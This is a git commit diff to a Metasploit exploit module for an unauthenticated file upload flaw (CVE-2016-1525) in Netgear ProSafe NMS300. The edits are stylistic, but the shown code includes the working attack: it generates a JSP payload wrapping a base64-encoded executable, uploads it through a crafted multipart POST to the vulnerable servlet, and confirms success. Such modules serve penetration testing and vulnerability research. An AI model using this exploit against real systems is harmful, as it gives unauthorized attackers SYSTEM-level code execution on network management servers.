Made style changes requested by OJ and others

Pedro Ribeiro · Pedro Ribeiro · commit 044b12d3a4c2 · 2016-02-23T15:14:04.000+07:00
diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb
@@ -5,7 +5,7 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
@@ -15,13 +15,13 @@ def initialize(info = {})
     super(update_info(info,
       'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
       'Description' => %q{
-      Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
-      The application has a file upload vulnerability that can be exploited by an
-      unauthenticated remote attacker to execute code as the SYSTEM user.
-      Two servlets are vulnerable, FileUploadController (located at
-      /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
-      This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
-      1.1.0.13.
+        Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+        The application has a file upload vulnerability that can be exploited by an
+        unauthenticated remote attacker to execute code as the SYSTEM user.
+        Two servlets are vulnerable, FileUploadController (located at
+        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
+        This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
+        1.1.0.13.
       },
       'Author' =>
         [
@@ -32,8 +32,8 @@ def initialize(info = {})
         [
           ['CVE', '2016-1525'],
           ['US-CERT-VU', '777024'],
-          ['URL', 'TODO_GITHUB_URL'],
-          ['URL', 'TODO_FULLDISC_URL']
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
         ],
       'DefaultOptions' => { 'WfsDelay' => 5 },
       'Platform' => 'win',
@@ -60,9 +60,9 @@ def check
       'method' => 'GET'
     })
     if res && res.code == 405
-      return Exploit::CheckCode::Detected
+      Exploit::CheckCode::Detected
     else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 
@@ -72,13 +72,13 @@ def generate_jsp_payload
     base64_exe = Rex::Text.encode_base64(exe)
     payload_name = rand_text_alpha(rand(6)+3)
 
-    var_raw     = rand_text_alpha(rand(8) + 3)
-    var_ostream = rand_text_alpha(rand(8) + 3)
-    var_buf     = rand_text_alpha(rand(8) + 3)
-    var_decoder = rand_text_alpha(rand(8) + 3)
-    var_tmp     = rand_text_alpha(rand(8) + 3)
-    var_path    = rand_text_alpha(rand(8) + 3)
-    var_proc2   = rand_text_alpha(rand(8) + 3)
+    var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
+    var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
+    var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
+    var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
+    var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
+    var_path    = 'f' + rand_text_alpha(rand(8) + 3)
+    var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)
 
     jsp = %Q|
     <%@page import="java.io.*"%>
@@ -102,10 +102,7 @@ def generate_jsp_payload
     %>
     |
 
-    jsp = jsp.gsub(/\n/, '')
-    jsp = jsp.gsub(/\t/, '')
-    jsp = jsp.gsub(/\x0d\x0a/, "")
-    jsp = jsp.gsub(/\x0a/, "")
+    jsp.gsub!(/[\n\t\r]/, '')
 
     return jsp
   end
@@ -115,9 +112,9 @@ def exploit
     jsp_payload = generate_jsp_payload
 
     jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
-    jsp_full_name = "null" + jsp_name + ".jsp"
+    jsp_full_name = "null#{jsp_name}.jsp"
     post_data = Rex::MIME::Message.new
-    post_data.add_part(jsp_name, nil, nil, "form-data; name=\"name\"")
+    post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
     post_data.add_part(jsp_payload,
       "application/octet-stream", 'binary',
       "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
@@ -130,7 +127,7 @@ def exploit
       'data'   => data,
       'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
     })
-    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name + ".jsp"}"/
+    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
       print_status("#{peer} - Payload uploaded successfully")
     else
       fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
